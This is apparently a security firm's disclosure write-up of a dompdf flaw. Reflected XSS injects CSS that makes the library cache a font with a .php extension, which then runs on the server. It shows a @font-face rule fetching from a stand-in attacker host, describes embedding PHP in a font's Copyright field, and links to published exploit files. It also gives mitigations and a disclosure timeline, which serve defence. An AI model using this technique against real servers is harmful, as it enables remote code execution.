From XSS to RCE (dompdf 0day)

-- MARKDOWN --
- The popular PHP library [dompdf](https://github.com/dompdf/dompdf) (used for rendering PDFs from HTML) suffers from a vulnerability that allows Remote Code Execution in certain configurations
- By injecting CSS into the data processed by dompdf, it can be tricked into storing a malicious font with a `.php` file extension in its font cache, which can later be executed by accessing it from the web
- We reported the vulnerability to dompdf on October 5th 2021. Since no patch is available yet, we are now publishing details about the vulnerability to inform the public about the risk and possible workarounds

# Introduction

During a client engagement last year, we were faced with a website that seemed fairly impenetrable at first glance, due to its largely static nature:

Target website (for the purposes of this article, we created a simple demo application that behaves similarly to the client’s website in the relevant aspects)

While investigating the site, we did manage to find a reflected Cross-Site Scripting (XSS) issue:

Seeing as the site did not store any sensitive information in clients’ browsers (such as authentication cookies), this in itself was a finding of low severity.

At some point however, an interesting feature caught our eye. The site offered the option to export some of its pages in PDF form:

Interesting feature: Exporting the website as a PDF, rendered on the server

Promptly, the reflected XSS became a lot more interesting, because it let us control the input to the server-side PDF generator as well:

Website with injected HTML in the title, rendered as PDF on the server

Though it wasn’t possible to inject JavaScript that the PDF renderer would interpret, we were able to inject arbitrary HTML (as shown above with the ‘In PDF’ title in italics).

Running [pdfinfo](<https://linux.die.net/man/1/pdfinfo>) on the exported PDF told us which library was responsible for the PDF rendering on the server:

Output of pdfinfo showing the PDF renderer used in the back-end

We thus knew which HTML-to-PDF converter was used in the back-end ([dompdf](https://github.com/dompdf/dompdf)), and at which version.

(Note that the version actually in use on the client’s server was v0.8.5, but since the exploit path we will show here still works the same on the newest version v1.2.0, we will be using this version for the purpose of the article. At the time of disclosure, there are no known vulnerabilities for either version 0.8.5 or 1.2.0.)

# Looking for a vulnerability

At this point, we shifted our attention to [dompdf’s source code](https://github.com/dompdf/dompdf), to see if we might be able to find a vulnerability that could get us further access to the server.

The first thing that caught our eye was the option to execute embedded PHP during PDF rendering, which, if enabled, would have made our job quite easy:

-- /MARKDOWN --

-- CODE language-js --
/**
* Enable embedded PHP
*
* If this setting is set to true then DOMPDF will automatically evaluate
* embedded PHP contained within <script type="text/php"> ... </script> tags.
*
* ==== IMPORTANT ====
* Enabling this for documents you do not trust (e.g. arbitrary remote html
* pages) is a security risk. Embedded scripts are run with the same level of
* system access available to dompdf. Set this option to false (recommended)
* if you wish to process untrusted documents.
*
* This setting may increase the risk of system exploit. Do not change
* this settings without understanding the consequences. Additional
* documentation is available on the dompdf wiki at:
* <https://github.com/dompdf/dompdf/wiki>
*
* @var bool
*/
private $isPhpEnabled = false;

-- MARKDOWN --

However, this feature turned out to be disabled. (Note: If you are running dompdf on your server, you probably want to ensure this feature is turned off. The official guide for [‘Securing dompdf’](https://github.com/dompdf/dompdf/wiki/Securing-dompdf) concurs.)

The next interesting setting concerned the loading of remote resources:

-- /MARKDOWN --

-- CODE language-js --
/**
* Enable remote file access
*
* If this setting is set to true, DOMPDF will access remote sites for
* images and CSS files as required.
*
* ==== IMPORTANT ====
* This can be a security risk, in particular in combination with isPhpEnabled and
* allowing remote html code to be passed to $dompdf = new DOMPDF(); $dompdf->load_html(...);
* This allows anonymous users to download legally doubtful internet content which on
* tracing back appears to being downloaded by your server, or allows malicious php code
* in remote html pages to be executed by your server with your account privileges.
*
* This setting may increase the risk of system exploit. Do not change
* this settings without understanding the consequences. Additional
* documentation is available on the dompdf wiki at:
* <https://github.com/dompdf/dompdf/wiki>
*
* @var bool
*/
private $isRemoteEnabled = false;

-- MARKDOWN --

To check for the state of this setting, we used the XSS to include an external stylesheet (shrinking the image and setting its background to light grey for testing purposes):

We could thus confirm that the setting was enabled, and could proceed with figuring out what this allowed us to do.

# First possibility: The font cache index

When `$isRemoteEnabled` is set (or on versions ≤ 0.8.5, regardless of this setting), dompdf allows loading custom fonts through font-face CSS rules such as the following:


-- /MARKDOWN --

-- CODE language-css --
@font-face {
   font-family:'TestFont';
   src:url('http://attacker.local/test_font.ttf');
   font-weight:'normal';
   font-style:'normal';
 }

-- MARKDOWN --

When an external font is used, dompdf caches it locally in the `/lib/fonts` sub-directory, and adds a corresponding entry in `dompdf_font_family_cache.php` using [`saveFontFamilies()`](https://github.com/dompdf/dompdf/blob/v1.1.1/src/FontMetrics.php#L83-L110). This function encodes the fonts known to dompdf as a PHP array, together with the information needed to look them up later.

From a log file we found elsewhere on the system, we already suspected that dompdf was stored in a directory accessible from the web-root, and indeed the lack of an error message when attempting to access the font cache index seemed to indicate the same:

Attempting to access the font cache index directly: Blank page instead of an error message

Since this means a PHP file we can access externally is generated based on input controlled by us, it seemed a worthwhile avenue to explore for potential vulnerabilities.

However, the only parameter we had direct influence over (the `$family`) was escaped sufficiently using [`addslashes()`](https://www.php.net/manual/en/function.addslashes.php) to make exploitation impossible. We therefore had to keep looking further - though not very far.

# Next step: The font cache

If we can’t use the font cache index... can we use the font cache directly?

Let’s see how [dompdf registers new fonts](https://github.com/dompdf/dompdf/blob/v1.2.0/src/FontMetrics.php#L174) (shown here in condensed form for the sake of clarity):

-- /MARKDOWN --

-- CODE language-js line-numbers --
/**
* @param array $style
* @param string $remoteFile
* @param resource $context
* @return bool
*/
public function registerFont($style, $remoteFile, $context = null)
{
   $fontname = mb_strtolower($style["family"]);
   $styleString = $this->getType("{$style['weight']} {$style['style']}");

   $fontDir = $this->options->getFontDir();
   $remoteHash = md5($remoteFile);

   $prefix = $fontname . "_" . $styleString;
   $prefix = preg_replace("[\\W]", "_", $prefix);
   $prefix = preg_replace("/[^-_\\w]+/", "", $prefix);

   $localFile = $fontDir . "/" . $prefix . "_" . $remoteHash;
   $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION));

   // Download the remote file
   list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);

   $localTempFile = @tempnam($this->options->get("tempDir"), "dompdf-font-");
   file_put_contents($localTempFile, $remoteFileContent);

   $font = Font::load($localTempFile);

   if (!$font) {
       unlink($localTempFile);
       return false;
   }

   $font->parse();
   $font->close();

   unlink($localTempFile);

   // Save the changes
   file_put_contents($localFile, $remoteFileContent);
   $this->saveFontFamilies();

   return true;
}

-- MARKDOWN --

There’s a few things this code snippet tells us:

1. The filename of a newly cached font is deterministic and based on information we have, namely the font’s name, the chosen style and a hash of its remote URL (line 9-19). The test-font from above with URL `http://attacker.local/test_font.ttf` and weight/style “normal” would e.g. get stored as `testfont_normal_d249c21fbbb1302ab53282354d462d9e.ttf`
2. Though care is taken to prevent the possibility of a path traversal vulnerability (by removing potentially dangerous characters in line 16 and 17), the font’s original file extension is kept
3. The font needs to be valid in the sense that it has to survive loading and parsing by [php-font-lib](https://github.com/dompdf/php-font-lib) (lines 28 and 35)

When inspecting [php-font-lib’s source code](https://github.com/dompdf/php-font-lib), it quickly became apparent that this library only checks a font’s internal consistency, based on its file headers, and completely ignores its file extension. So what happens if we take a valid `.ttf` font, add a `<?php phpinfo(); ?>` in its Copyright section, store it as 'exploit_font*.php*' and include it via an injected CSS file? Well...

phpinfo() is executed on the victim server when accessing the malicious font file (Side note: The redacted information was replaced by random noise before blurring)

We have published the demo application and exploit at [github.com/positive-security/dompdf-rce](https://github.com/positive-security/dompdf-rce).

# Analysis

Security vulnerabilities often occur due to (design) decisions made based on incorrect assumptions about underlying or interconnected components. For the concrete scenario we encountered, we could identify three decisions/assumptions that contributed significantly to the RCE vulnerability on the client’s server:

1. “It should be okay to trust php-font-lib with checking fonts, since it will only accept fonts that are valid (and have the appropriate file extension)”: This assumption, made by the dompdf developers, turned out to be incorrect because php-font-lib’s concept of a valid font only required consistency between the font’s headers and its internal structure, irrespective of its file extension
2. “It should be okay to have dompdf’s setting `$isRemoteEnabled` set to true, since the website itself is essentially static and we therefore control the input to the PDF renderer”: This assumption, made by our client, was broken by the reflected XSS vulnerability
3. “It should be okay to have dompdf in an externally accessible sub-directory”: This action, though probably not performed consciously by our client but rather out of convenience, sadly turned out to be misguided

Though all three factors were necessary for the full exploit, they differ in respect to ‘preventability’.

The first decision, which led to the font vulnerability, was a mistake that (albeit unfortunate) can readily occur in any complex software project and is essentially impossible to avoid completely. The second decision increased the attack surface for our client, but was necessary to implement the intended functionality.

The third factor could be seen more critically however, since it directly contradicted the top-most point outlined in the guide for [‘Securing dompdf’](https://github.com/dompdf/dompdf/wiki/Securing-dompdf#1-install-dompdf-to-a-location-outside-your-websites-document-root), which has existed in this form since 2016. From a post-mortem perspective, it would therefore make sense to examine the workflow that resulted in this step being taken, as including an external library without properly assessing its security impact would have been the most easily preventable factor.

# Impact

There are a number of use cases that require server-side generation of PDFs containing user-supplied input, such as ticket purchases, receipts/invoices or other automated emails from service providers, or even Corona test certificates. It is possible that some of these services are also affected, if the following preconditions are met:

- dompdf is installed in a directory accessible through the web. This could for example easily happen if [Composer](https://getcomposer.org/) was used to install the library somewhere inside the docroot without explicitly forbidding access to the `vendor` folder
- PDFs are being generated using insufficiently sanitized user input. This could be caused through e.g. an XSS, as demonstrated here, or by directly passing user data to the back-end (such as the user’s name or address)
- dompdf version ≤ 0.8.5 is being used, or `$isRemoteEnabled` is set to true. **Note that versions ≤ 0.8.5 do not require `$isRemoteEnabled` to be set to be vulnerable, as they load certain remote elements (such as fonts) even with the setting deactivated**

While we don't have installation numbers, GitHub metrics suggest dompdf to be the most popular option for generating PDFs from PHP:

Library Stars Forks Dependent Repos
dompdf 8.6k 1.6k 59.2k
snappy 4k 421 -
mpdf 3.5k 886 16.6k
tcpdf 3.2k 1.3k 14.5k
tc-lib-pdf 1.2k 180 85

# Mitigation

Though there isn’t a patch for dompdf available yet, there are steps you can take to minimize your risk of being exposed to this vulnerability.

1. **Make sure dompdf is not installed in a web-accessible directory.** This is the most important point, as it would completely prevent the exploit
2. Double-check the input sanitization you perform before passing data to dompdf, to prevent attackers from injecting HTML/CSS. This is a good idea in any case, as there might be other vulnerabilities that can be triggered in similar ways
3. Update dompdf to a recent version and turn off `$isRemoteEnabled`, if possible for your use case. Though the most recent version available at time of publishing this article (1.2.0) is still susceptible to the vulnerability, it *does* consult the `$isRemoteEnabled` setting before attempting to download fonts from remote locations (unlike versions ≤ 0.8.5, which simply ignore the setting in that context)
4. And finally, keep an eye out for a dompdf patch that fixes this vulnerability and apply it once it is available. You could for example stay up-to-date by subscribing to [dompdf’s release feed](https://github.com/dompdf/dompdf/releases.atom) with an Atom reader of your choice

# Timeline

`2021-10-05` Vulnerability reported to security@dompdf.org (from [SECURITY.md](https://github.com/dompdf/dompdf/blob/master/SECURITY.md))
`2021-10-08` Followed up on report
`2021-10-12` Created a [GitHub issue](https://github.com/dompdf/dompdf/issues/2598) to draw attention to report
`2021-10-13` Report acknowledged, issue tagged for “v2.0.0”
`2021-11-16` Version 1.1.0 released, without fix
`2021-11-24` Version 1.1.1 released, without fix
`2022-01-03` 90 days since initial report
`2022-02-07` Version 1.2.0 released, without fix
`2022-02-07` Asked developers for patching horizon and notified them of upcoming disclosure
`2022-02-16` Follow-up email
`2022-03-10` Follow-up email
`2022-03-15` Received response from dompdf that they "can not provide a time frame for said [v2.0] update at this moment"
`2022-03-16` Public disclosure

# Conclusion

While investigating a client website, we discovered a vulnerability in the PDF rendering PHP library dompdf that allowed us to upload font files with a `.php` extension to the web server. To trigger it, we used an XSS vulnerability that allowed us to inject HTML into a web page before it was rendered as a PDF. Since dompdf was installed in a web-accessible directory (and we knew its location thanks to a leaked logfile), we could navigate to the uploaded `.php` script, giving us code execution on the server.

Versions ≤ 1.2.0 of dompdf that are located in a web-accessible directory and have `$isRemoteEnabled` activated should be considered vulnerable, as should be versions ≤ 0.8.5 even with `$isRemoteEnabled` set to false.

The exploit files and source code for the demo application are available [on GitHub](https://github.com/positive-security/dompdf-rce).

-- /MARKDOWN --

Follow us on Mastodon (@positive_sec) to keep up to date with our posts.